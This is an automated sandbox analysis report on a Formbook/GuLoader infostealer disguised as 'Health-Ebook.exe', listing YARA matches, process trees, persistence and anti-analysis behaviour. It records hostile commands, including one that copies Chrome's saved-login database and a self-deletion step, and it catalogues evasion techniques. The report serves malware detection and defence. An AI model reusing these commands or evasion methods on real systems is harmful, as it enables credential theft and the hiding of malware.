Source: Health-Ebook.exe, 00000002.00000002.824038422.000000001EF00000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Health-Ebook.exe
Source: Health-Ebook.exe, 00000002.00000002.824096006.000000001F050000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Health-Ebook.exe
Source: Health-Ebook.exe | Binary or memory string: OriginalFilenameCerithiumun.exe vs Health-Ebook.exe
Tries to load missing DLLs
Source: C:\Windows\explorer.exe | Section loaded: ndfapi.dll
Yara signature match
Source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Binary contains paths to development resources
Source: explorer.exe, 00000003.00000000.796297277.0000000007CD5000.00000004.00000001.sdmp | Binary or memory string: .VBPcuZ
Classification label
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@15/8@9/3
Creates files inside the user directory
Source: C:\Windows\SysWOW64\netsh.exe | File created: C:\Users\user\AppData\Roaming\O2116906
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_01
Creates temporary files
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Bjrnh
PE file has an executable .text section and no other executable section
Source: Health-Ebook.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the VB runtime library 6.0 (probably coded in Visual Basic)
Source: C:\Users\user\Desktop\Health-Ebook.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Reads ini files
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\Health-Ebook.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Users\user\Desktop\Health-Ebook.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Health-Ebook.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Health-Ebook.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Health-Ebook.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\netsh.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: Health-Ebook.exe | Virustotal: Detection: 63%
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\Health-Ebook.exe 'C:\Users\user\Desktop\Health-Ebook.exe'
Source: unknown | Process created: C:\Users\user\Desktop\Health-Ebook.exe 'C:\Users\user\Desktop\Health-Ebook.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Health-Ebook.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\Bjrnh\h8tczuli.exe C:\Program Files (x86)\Bjrnh\h8tczuli.exe
Source: unknown | Process created: C:\Program Files (x86)\Bjrnh\h8tczuli.exe C:\Program Files (x86)\Bjrnh\h8tczuli.exe
Source: unknown | Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Users\user\Desktop\Health-Ebook.exe | Process created: C:\Users\user\Desktop\Health-Ebook.exe 'C:\Users\user\Desktop\Health-Ebook.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Bjrnh\h8tczuli.exe C:\Program Files (x86)\Bjrnh\h8tczuli.exe
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Health-Ebook.exe'
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Process created: C:\Program Files (x86)\Bjrnh\h8tczuli.exe C:\Program Files (x86)\Bjrnh\h8tczuli.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Writes ini files
Source: C:\Windows\SysWOW64\netsh.exe | File written: C:\Users\user\AppData\Roaming\O2116906\O21logri.ini
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\netsh.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Binary contains paths to debug symbols
Source: Binary string: chkdsk.pdbGCTL | source: h8tczuli.exe, 0000000F.00000002.1088912721.0000000000090000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000000.793470869.0000000007010000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb | source: Health-Ebook.exe, 00000002.00000002.820558651.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb | source: h8tczuli.exe, 0000000F.00000002.1088912721.0000000000090000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Health-Ebook.exe, 00000002.00000002.825390421.000000001F5FF000.00000040.00000001.sdmp, h8tczuli.exe, 0000000F.00000002.1093741018.000000001F4BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000003.1091567984.0000000000AF0000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbGCTL | source: Health-Ebook.exe, 00000002.00000002.820558651.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Health-Ebook.exe, h8tczuli.exe, chkdsk.exe, 00000010.00000003.1091567984.0000000000AF0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000000.793470869.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: Process Memory Space: Health-Ebook.exe PID: 1616, type: MEMORY
Source: Yara match | File source: Process Memory Space: Health-Ebook.exe PID: 3764, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_00409018 push esi; iretd 0_2_00409019
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_004068B4 push ecx; retf 0_2_004068B5
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_004086EC push ecx; ret 0_2_004086ED
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_00408748 push ebp; ret 0_2_00408749
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_00408F30 push esi; iretd 0_2_00408F31
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_0204567D push ss; iretd 0_2_0204574A
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_020456FE push ss; iretd 0_2_0204574A
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_02043409 push esi; retf 0_2_0204340F
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_02043509 push esi; retf 0_2_0204350F
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 0_2_020455A6 push ss; iretd 0_2_020455CA
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F55DE2D push ecx; ret 2_2_1F55DE40
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_000A0000 push cs; ret 2_2_000A002C
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_000B9A35 push eax; ret 2_2_000B9A88
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_000B9A8B push eax; ret 2_2_000B9AF2
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_000B9A82 push eax; ret 2_2_000B9A88
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_000B9AEC push eax; ret 2_2_000B9AF2
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_000B46E2 push es; ret 2_2_000B46EC
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F3409 push esi; retf 2_2_004F340F
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F3509 push esi; retf 2_2_004F350F
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F55A6 push ss; iretd 2_2_004F55CA
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F567D push ss; iretd 2_2_004F574A
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_004F56FE push ss; iretd 2_2_004F574A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F3409 push esi; retf 14_2_006F340F
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F3509 push esi; retf 14_2_006F350F
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F55A6 push ss; iretd 14_2_006F55CA
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F567D push ss; iretd 14_2_006F574A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 14_2_006F56FE push ss; iretd 14_2_006F574A
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_1F41DE2D push ecx; ret 15_2_1F41DE40
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_00079A35 push eax; ret 15_2_00079A88
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_00079A82 push eax; ret 15_2_00079A88
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Code function: 15_2_00079A8B push eax; ret 15_2_00079AF2

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\netsh.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JLUXIVHP
Source: C:\Windows\SysWOW64\netsh.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run JLUXIVHP

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\Health-Ebook.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Health-Ebook.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Health-Ebook.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000003007244 second address: 000000000300724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 00000000030074AE second address: 00000000030074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Health-Ebook.exe | Code function: 2_2_1F5D5595 rdtsc
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Health-Ebook.exe | API coverage: 4.2 %
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe | API coverage: 4.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Health-Ebook.exe TID: 2412 | Thread sleep count: 180 > 30
Source: C:\Windows\SysWOW64\netsh.exe TID: 4460 | Thread sleep time: -65000s >= -30000s
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe TID: 1416 | Thread sleep count: 134 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000003.00000000.794031278.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.794031278.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.794031278.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.794031278.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 0_2_0204008A NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000
Hides threads from debuggers
Source: C:\Users\user\Desktop\Health-Ebook.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Health-Ebook.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Health-Ebook.exe; Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe; Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe; Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe; Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Health-Ebook.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe; Process queried: DebugPort
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exe; Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D5595 rdtsc
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 0_2_0204251B LdrInitializeThunk
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 0_2_02040E18 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 0_2_02041F5F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 0_2_02043F7D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 0_2_02043FBB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 0_2_02044502 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 0_2_0204159F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F51DF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F535744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F535744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F52C74A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F52C74A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F582F40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5B3740 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5B8747 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F549F7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F51EF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F540761 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F531F10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F531F10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2F18 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2F18 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5C2F18 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F506700 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F506700 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F506700 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F532700 mov edi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F516F05 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5D870A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F506F30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F506F30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CDF39 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F502FD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5067D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5067D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5067D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5BF7D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5867C9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5867C9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F50E7F3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5B87F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5347FD mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5347FD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5347FD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F503FE5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F503FE5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F503FE5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5177ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CF7E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CF7E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CF7E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F5CF7E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Health-Ebook.exe; Code function: 2_2_1F525790 mov eax, dword ptr fs:[00000030h]
